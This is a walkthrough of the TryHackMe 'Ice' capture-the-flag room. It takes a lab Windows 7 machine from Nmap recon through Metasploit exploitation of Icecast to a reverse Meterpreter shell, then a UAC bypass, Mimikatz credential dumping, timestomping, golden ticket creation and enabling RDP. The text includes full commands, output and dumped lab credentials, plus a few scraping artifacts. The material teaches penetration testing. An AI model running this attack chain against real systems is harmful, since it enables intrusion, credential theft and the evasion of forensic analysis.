Hello everyone, and welcome to a new video in the TryHackMe
playlist! This is my first walkthrough video on TryHackMe, and in this video,
we'll be exploiting and gaining privilege escalation on a vulnerable VM called
"Ice."
You might wonder why I chose this VM. During my time with
VulnHub, I never encountered any Windows-vulnerable VMs. So, I decided to
explore TryHackMe. Although several Windows VMs are available, I decided
to start with a free one, and "Ice" was my choice.
Engage in a cybersecurity challenge in the Ice room on TryHackMe. This room offers a structured approach to learn and apply various security concepts, perfect for beginners and experts alike.
As I mentioned in my introductory video, TryHackMe is known
for its structured learning paths. In this video, our goal is to follow the
given tasks, deploy, and hack into a Windows machine by exploiting a poorly
secured media server.
Task 1: Connect
Connecting to the TryHackMe network is the primary step, and
it's crucial to remember that you must connect every time you start your
attacking machine.
To connect to the TryHackMe network, we use a bridge, and
the most commonly used one is OpenVPN. If you've watched the HackTheBox series,
you'll be familiar with how we use OpenVPN for this purpose.
Explore various hacking challenges, resources, and tools provided by CyberSecMastery's Hack Box. Perfect for both beginners and seasoned professionals, this platform offers a comprehensive suite of exercises to hone your cybersecurity skills.
Here’s how to do it:
First, Download the Configuration File. So, Visit the
TryHackMe access page and download the OpenVPN configuration file.
Join TryHackMe to access a wide range of cybersecurity labs, challenges, and learning paths designed to enhance your hacking skills. Whether you're a beginner or an experienced professional, TryHackMe offers a platform to practice and improve your cybersecurity expertise.
Now, Open a Terminal. Use the OpenVPN client tool to
connect. Ensure you use sudo for the command.
┌──(kali㉿kali)-[~]
└─$ sudo openvpn <OpenVPN Configuration file>
When you run this command, you'll
see a lot of text. At the end, it should say "Initialization Sequence
Completed."
You can verify your connection by looking at your access
page on TryHackMe. Refresh the page, and you should see a green tick next to
"Connected." It will also show your internal IP address.
Now that you're connected, you are ready to use the machines
on the TryHackMe network! When we deploy the VM in our task, you'll see its
internal IP address.
Note that, the virtual machine used in this room (Ice) can
also be downloaded for offline usage. Click on the provided link to access the
download page. Additionally, the sequel to this room, Blaster, can be found
there as well.
Task 2: Recon
In the past, I used the term "Enumeration," which
is synonymous with "Recon." So don't get confused by the terminology.
Our first priority is to scan and enumerate our target. But before we do that,
we need to identify our target.
First, we have to deploy the machine! This may take up to
three minutes to start. Once the machine is deployed, the target IP address
will be provided.
For this task, the target IP is 10.10.162.253.
Before proceeding, ensure that the target is reachable by
performing a ping test. This helps confirm that the target is connected to our
network and is receiving data.
┌──(kali㉿kali)-[~]
└─$ ping 10.10.162.253
PING 10.10.162.253 (10.10.162.253) 56(84) bytes of data.
64 bytes from 10.10.162.253: icmp_seq=1 ttl=124 time=479 ms
64 bytes from 10.10.162.253: icmp_seq=2 ttl=124 time=228 ms
64 bytes from 10.10.162.253: icmp_seq=3 ttl=124 time=242 ms
^C
--- 10.10.162.253 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2001ms
rtt min/avg/max/mdev = 227.922/316.024/478.592/115.087 ms
┌──(kali㉿kali)-[~]
└─$
So, let's now perform a network scan to detect which ports
are open. This is a crucial part of the recon process as it helps us understand
the attack surface and plan targeted attacks.
Perform Network Scan using Nmap
We will use the famous Nmap tool for this purpose.
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -Pn 10.10.162.253
Where,
The -sC option is used to perform a script scan
using the default set of scripts. It's useful for gathering additional
information about the target.
The -sV option enables version detection, which
identifies the versions of services running on open ports.
The -Pn option is used when we want to perform a scan
without pinging the target first. It treats all hosts as online, which is
useful if ICMP requests are blocked.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 22:56 IST
Nmap scan report for 10.10.162.253
Host is up (0.41s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=Dark-PC
| Not valid before: 2024-07-22T17:04:45
|_Not valid after: 2025-01-21T17:04:45
| rdp-ntlm-info:
| Target_Name: DARK-PC
| NetBIOS_Domain_Name: DARK-PC
| NetBIOS_Computer_Name: DARK-PC
| DNS_Domain_Name: Dark-PC
| DNS_Computer_Name: Dark-PC
| Product_Version: 6.1.7601
|_ System_Time: 2024-07-23T17:29:31+00:00
|_ssl-date: 2024-07-23T17:30:01+00:00; 0s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
8000/tcp open http Icecast streaming media server
|_http-title: Site doesn't have a title (text/html).
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 220.98 seconds
┌──(kali㉿kali)-[~]
└─$
The network scan reveals several important details about the
host at the IP address, 10.10.162.253,
which appears to be a Windows 7 machine named "Dark-PC" within a
workgroup called "WORKGROUP." The scan identified 10 open ports, each
associated with specific services:
135/TCP (msrpc): This port is used by Microsoft Windows RPC
(Remote Procedure Call), a core functionality for communication between
applications and services.
139/TCP (netbios-ssn): This port is used by Microsoft's
NetBIOS name service, enabling network browsing and resource sharing.
445/TCP (microsoft-ds): Commonly used for SMB (Server
Message Block) file sharing, this port provides access to Windows file systems.
The scan also revealed that the operating system version is Windows 7
Professional 7601 Service Pack 1, and the machine is part of the
"WORKGROUP" workgroup.
3389/TCP (ssl/ms-wbt-server?): Typically used for Remote
Desktop Protocol (RDP) with SSL, this port was found to have a self-signed
certificate named "Dark-PC," valid from July 22nd, 2024, to January
21st, 2025.
5357/TCP (http): This port hosts a basic web server running
Microsoft HTTP API httpd 2.0. The server responded with "Service
Unavailable."
8000/TCP (http): Another web server is potentially running
on this port, possibly an Icecast streaming media server. However, specific
title information was unavailable.
49152/TCP, 49153/TCP, 49154/TCP, 49158/TCP, 49159/TCP,
49160/TCP (msrpc): These ports are associated with additional Microsoft Windows
RPC services. They are currently identified as unknown, and further
investigation might be needed to determine their exact purpose.
Answer the questions below
What is the Port number of one of
the more interesting ports that is open Microsoft Remote Desktop (MSRDP)?
As I already told you this is: 3389
What service did nmap identify as
running on port 8000? (First word of this service)
This port 8000 runs the Icecast streaming media server. So,
the first word of this service is Icecast.
What does Nmap identify as the
hostname of the machine?
The hostname identified by Nmap is DARK-PC.
Now, let's move on to Task 3.
Task 3: Gain Access
Gaining access involves exploiting a vulnerability to
establish a foothold on the target system. In our previous task, we identified
several interesting services running on our target machine, including Icecast.
Icecast is an open-source software that allows streaming
audio content over the internet, much like a digital radio station. It can be
used for creating online radio stations or hosting personal audio libraries.
However, the version of Icecast running on our target has significant
vulnerabilities with a high-risk level, scoring around 7.5 (or 7.4 depending on
the source).
Answer the questions below
What is the Impact Score for this
vulnerability? It has given a hint to use CVEdetails.com, to find the impact
score.
However, I couldn’t find the information directly on the
site. Instead, I used a useful trick: a Google search led me to an Exploit DB
link where the CVE details are available.
The vulnerability in question is associated with Icecast
2.0.1 (Win32) and is identified as CVE-2004-1561.
Based on the details found,
the Impact Score for this vulnerability is 6.4.
What is the CVE number for this
vulnerability?
The CVE number is already told, that is CVE-2004-1561.
Now that we’ve identified the vulnerability, let’s find and
use the corresponding exploit with Metasploit.
Exploit using MSF Console
Let's go ahead and launch the Metasploit framework.
┌──(kali㉿kali)-[~]
└─$ sudo msfdb start && msfconsole
[sudo] password for kali:
[i] Database already started
Metasploit tip: Writing a custom module? After editing your module, why not try
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/icecast_header) >
By looking at the options, we’ll need to set the RHOSTS (Target IP address)
and the LHOST
(Attacker’s IP address). The IP address for LHOST can be found on the tun0adapter.
With all options set, we are now ready to execute the
exploit.
msf6 exploit(windows/http/icecast_header) > set RHOSTS 10.10.162.253
RHOSTS => 10.10.162.253
msf6 exploit(windows/http/icecast_header) > set LHOST 10.17.23.11
LHOST => 10.17.23.11
msf6 exploit(windows/http/icecast_header) >
Upon successful attempt, we have successfully got a Meterpreter
session.
msf6 exploit(windows/http/icecast_header) > run
[*] Started reverse TCP handler on 10.17.23.11:4444
[*] Sending stage (176198 bytes) to 10.10.162.253
[*] Meterpreter session 1 opened (10.17.23.11:4444 -> 10.10.162.253:49260) at 2024-07-23 23:26:12 +0530
meterpreter >
Answer the given questions
The only required setting that is currently blank is RHOSTS.
Although LHOST is required, if you
are using a paid membership or an online attacking machine, LHOST might already be set.
Task 4: Escalate
Previously, we’ve successfully gained access to the victim
machine! Now, it’s time to enumerate the system and identify potential
privilege escalation paths to gain administrative powers. Let’s follow the
steps below to gather the necessary information:
To not distract our path we will follow the questions
below.
What's the name of
the shell we have now?
We are currently using the Meterpreter shell.
What user was running
that Icecast process?
To determine which user is running the Icecast process, we
need to check the running processes. Use the pscommand in Meterpreter.
2256 1444 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
2412 692 sppsvc.exe
2580 692 SearchIndexer.exe
meterpreter >
From the output, you’ll
see that the Icecast process (Icecast2.exe)
is running under the user Dark.
Answer the questions below
Top of
Form
What build of Windows
is the system?
To get the Windows build information, use the sysinfo command in
Meterpreter.
meterpreter > sysinfo
Computer : DARK-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
The build number of the Windows system is 7601.
Now that we know some
of the finer details of the system we are working with, let's start escalating
our privileges. First, what is the architecture of the process we're running?
As from the system information, we already found that the architecture is X64.
Now that we know the architecture of the process, let's
perform additional reconnaissance. Although this may not be as effective onx64 machines, we should run this command to find potential exploits.
This command may appear to hang for a few minutes as it tests various exploits. Once it completes, it will provide a list of potential local exploits for privilege escalation.
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.10.162.253 - Collecting local exploits for x86/windows...
[*] 10.10.162.253 - 193 exploit checks are being tried...
[+] 10.10.162.253 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.162.253 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.10.162.253 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.162.253 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.162.253 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.162.253 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.162.253 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.162.253 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.162.253 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[+] 10.10.162.253 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.162.253 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
3 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
4 exploit/windows/local/ms13_053_schlamperei Yes The target appears to be vulnerable.
5 exploit/windows/local/ms13_081_track_popup_menu Yes The target appears to be vulnerable.
6 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
7 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
8 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable.
9 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
10 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
11 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
12 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
13 exploit/windows/local/always_install_elevated No The target is not exploitable.
14 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system
15 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
16 exploit/windows/local/bthpan No The target is not exploitable.
17 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
18 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
19 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
20 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
21 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
22 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
23 exploit/windows/local/ikeext_service No The check raised an exception.
24 exploit/windows/local/ipass_launch_app No The check raised an exception.
25 exploit/windows/local/lenovo_systemupdate No The check raised an exception.
26 exploit/windows/local/lexmark_driver_privesc No The check raised an exception.
27 exploit/windows/local/mqac_write No The target is not exploitable.
28 exploit/windows/local/ms10_015_kitrap0d No The target is not exploitable.
29 exploit/windows/local/ms14_070_tcpip_ioctl No The target is not exploitable.
30 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable.
31 exploit/windows/local/ms16_016_webdav No The target is not exploitable.
32 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The target is not exploitable.
33 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
34 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
35 exploit/windows/local/ms_ndproxy No The target is not exploitable.
36 exploit/windows/local/novell_client_nicm No The target is not exploitable.
37 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
38 exploit/windows/local/panda_psevents No The target is not exploitable.
39 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
40 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable.
41 exploit/windows/local/webexec No The check raised an exception.
meterpreter >
From the results, we have to select an appropriate exploit
that could provide full access. For this walkthrough, we will choose the first
exploit.
Answer the questions below
What is the full path for the first
returned exploit?
The path for the first exploit is exploit/windows/local/bypassuac_eventvwr.
Once you’ve identified the exploit to use, background the
current session to proceed with the next steps. You can do this by typing, background or by pressing Ctrl + Z.
Before proceeding with the exploit, take note of the session
number you have. You can list all active sessions by using the command sessions when outside the
Meterpreter shell. In my case, the session number is 1.
Now, go ahead and select the previously identified local
exploit for use with the command, use, and then specify the full path for the exploit.
msf6 exploit(windows/http/icecast_header) > use exploit/windows/local/bypassuac_eventvwr
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_eventvwr) >
It’s time to check the available options to configure.
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/bypassuac_eventvwr) >
Local exploits require a session to be specified, so set this by running: set session <specify the session number>, that is, also after setting the session number, additional options need to be configured from the options menu. We'll have to set one more as our listener IP
isn't correct.
So, Set the LHOST option now.
msf6 exploit(windows/local/bypassuac_eventvwr) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/bypassuac_eventvwr) > set LHOST 10.17.23.11
LHOST => 10.17.23.11
msf6 exploit(windows/local/bypassuac_eventvwr) >
Answer the questions below
What
is the name of this option?
The answer is RHOST.
Once, the necessary options are configured, we now can run the
privilege escalation exploit by typing: run.
Please note that this might take a few attempts, and you may need to restart the machine and re-exploit the service if the initial attempt fails. After successfullyescalating privileges, a new Meterpreter session should open.
msf6 exploit(windows/local/bypassuac_eventvwr) > run
[*] Started reverse TCP handler on 10.17.23.11:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (176198 bytes) to 10.10.162.253
[*] Cleaning up registry keys ...
[*] Meterpreter session 2 opened (10.17.23.11:4444 -> 10.10.162.253:49275) at 2024-07-23 23:38:55 +0530
meterpreter >
So, we can now verify the expanded permissions using the command, getprivs.
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
meterpreter >
Answer the questions below
What permission listed allows us to take
ownership of files?
The “SeTakeOwnershipPrivilege” permission listed allows us
to take ownership of files.
Let’s move on to the next task.
Bottom of Form
Task 5: Looting
In this task, we will learn how to gather additional
credentials and crack the saved hashes on the machine. Before proceeding, we
need to migrate to a process that has the necessary permissions to interact
with the lsass
service, which handles authentication in Windows.
Before further action, we need to move to a process that
actually has the permissions that we need to interact with the lsass service,
the service responsible for authentication within Windows.
To identify a suitable process, we first list all running
processes by using the command ps. This will display a list of processes along
with their process IDs (PIDs), names, and the users running them.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
100 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
508 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
544 536 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
592 536 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
604 584 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
652 584 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
688 692 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
692 592 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
700 592 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
708 592 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
2256 1444 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
2272 692 taskhost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\taskhost.exe
2412 692 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
2580 692 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
meterpreter >
Now, we have to identify a Suitable Process.
Look for processes running under NT AUTHORITY\SYSTEM
account. Even though our current process may not have the required permissions,
we can migrate to a process running as SYSTEM to gain full access.
By migrating to a SYSTEM-level process, we gain the
necessary privileges to interact with thelsass service and extract credentials. Once we've
identified a suitable process, we can proceed with the migration and begin
gathering credentials.
In order to interact with, lsass, we need to be within a process that matches
the architecture of the lsass
service (x64 in this case) and has the same permissions. The printer spool service is ideal
for this purpose, as it meets the necessary criteria and will automatically
restart if it crashes.
Answer the questions below
What's the name of the printer
service?
The answer is spoolsv.exe.
When we say 'living in' a process, it refers to the
technique of injecting malicious code into a running program by loading a
shared library (DLL) into it. This can allow us to spawn a new thread that
hosts our shell. To migrate to the printer spool service, use the command:
migrate -N <specify the PROCESS_NAME>.
meterpreter > migrate -N spoolsv.exe
[*] Migrating from 1216 to 1304...
[*] Migration completed successfully.
meterpreter >
Let’s Check the Current User. After migrating, verify the
user context by running the command getuid.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Answer the questions below
What user is listed?
The answer should be NT AUTHORITY\SYSTEM.
Now that we've achieved full administrator permissions, we
can focus on extracting valuable information and credentials from the system.
Using Mimikalz
Mimikatz is a well-known tool for dumping passwords and is
incredibly useful for gathering credentials. In our meterpreter session, we can
use the updated version of Mimikatz, known as Kiwi, by loading it with the
command load kiwi.
Use the command load kiwi to load Kiwi into the meterpreter
session. This will expand the help menu with new commands available for use.
Check the newly added commands by typing help to see what options
are available. Here, it is.
Kiwi Commands
=============
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_livessp Retrieve Live SSP creds
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitrary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
For more info on a specific command, use <command> -h or help <command>.
Answer the questions below
Which command allows up to retrieve all
credentials?
The answer is the creds_all command, which retrieves all credentials
from the system.
Run the creds_all command, to dump all available credentials.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Dark Dark-PC e52cac67419a9a22ecb08369099ed302 7c4fe5eada682714a036e39378362bab 0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
DARK-PC$ WORKGROUP (null)
Dark Dark-PC Password01!
tspkg credentials
=================
Username Domain Password
-------- ------ --------
Dark Dark-PC Password01!
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Dark Dark-PC Password01!
dark-pc$ WORKGROUP (null)
meterpreter >
Mimikatz can extract these
passwords from memory, even if the user 'Dark' is not currently logged in,
thanks to a scheduled task that runs Icecast under the 'Dark' user's account.
Additionally, the absence of Windows Defender on the system makes this process
easier.
Answer the questions below
What is Dark's password?
The
password is Password01!
Now that we've retrieved the necessary credentials, let's
move on to the next task.
Task 6: Post-Exploitation
Let's explore the post-exploitation actions we can take on a
Windows system. These actions can provide valuable information and access, but
they should be carried out with caution and only when authorized.
Before diving into specific actions, let's revisit the help
menu in the meterpreter shell. We'll use it to answer the following questions.
Answer the questions below
What command allows
us to dump all of the password hashes stored on the system?
The answer is hashdump.
The hashdump command allows us to
dump all the password hashes stored on the system.
Note that while we can
obtain these hashes, we won't attempt to crack the administrative password, as
it is intentionally strong to prevent password spraying attempts.
Answer the questions below
While more useful
when interacting with a machine being used, what command allows us to watch the
remote user's desktop in real-time?
The screenshare the command allows us to view the remote user's desktop in real-time.
meterpreter > screenshare
[*] Preparing player...
[*] Opening player at: /home/kali/XprjEfJc.html
[*] Streaming...
This is
particularly useful when the machine is actively being used.
Answer the questions below
How about if we
wanted to record from a microphone attached to the system?
The record_mic
command can be used to record audio from the system's microphone.
To complicate
forensics efforts we can modify the timestamps of files on the system. What command
allows us to do this?
The timestomp
command can modify the timestamps of files.
Important
Note: This action should only be performed if explicitly
allowed, as it can complicate the forensic analysis of a pentest.
Mimikatz allows us to
create what's called a `golden ticket`, allowing us to authenticate anywhere
with ease. What command allows us to do this?
The golden_ticket
command within Mimikatz allows the creation of a golden ticket. This attack
leverages the Kerberos ticket-granting ticket to maintain persistence and
authenticate as any user on the domain.
meterpreter > golden_ticket_create
Usage: golden_ticket_create [options]
Create a golden kerberos ticket that expires in 10 years time.
OPTIONS:
-d FQDN of the target domain (required)
-e End in ... Duration in hours (ex: -e 10 for 10 hours), default 10 YEARS
-g Comma-separated list of group identifiers to include (eg: 501,502)
-h Help banner
-i ID of the user to associate the ticket with
-k krbtgt domain user NTLM hash
-s SID of the domain
-t Local path of the file to store the ticket in (required)
-u Name of the user to create the ticket for (required)
meterpreter >
What are Golden Ticket Attacks?
Golden ticket attacks exploit the Kerberos authentication system used in Windows domains. They allow an attacker to create a valid ticket that can be used to access any service in the domain, maintaining long-term access even after passwords are changed.
One last thing to note. with the password for the user
'Dark,' we can authenticate to the machine via Remote Desktop (MSRDP). While
this provides a unique perspective, be mindful that connecting via RDP may
disrupt the user currently signed in. If RDP hasn't been enabled, we can do so
using the Metasploit module: run post/windows/manage/enable_rdp.
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /home/kali/.msf4/loot/20240724000233_default_10.10.162.253_host.windows.cle_109806.txt
meterpreter >
This command will enable RDP access, allowing us to view the
machine as the user would.
Let's move on to the final task.
Task 7: Extra Credit
This task was already covered in Task 3, where we explored
manual exploitation using exploit code found on Exploit-DB.
As you progress in
your pen testing journey, you'll inevitably encounter scenarios where you need
to exploit vulnerabilities without using Metasploit.
Access the Exploit Database (Exploit-DB) for a vast repository of public exploits and Proof-of-Concepts (PoCs) for various vulnerabilities. Stay updated with the latest security research and leverage this valuable resource for penetration testing and cybersecurity research.
We provided a link to an
Exploit-DB entry that details an Icecast vulnerability allowing for remote code
execution. While it's not a requirement for this task, it's highly recommended
to try exploiting the vulnerability using the provided code or a similar
exploit. This will help you develop and refine your manual exploitation skills.
If you have any questions or concerns related to this video,
please feel free to leave them in the comment section below. We're here to
help!
.png){kind=small}
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
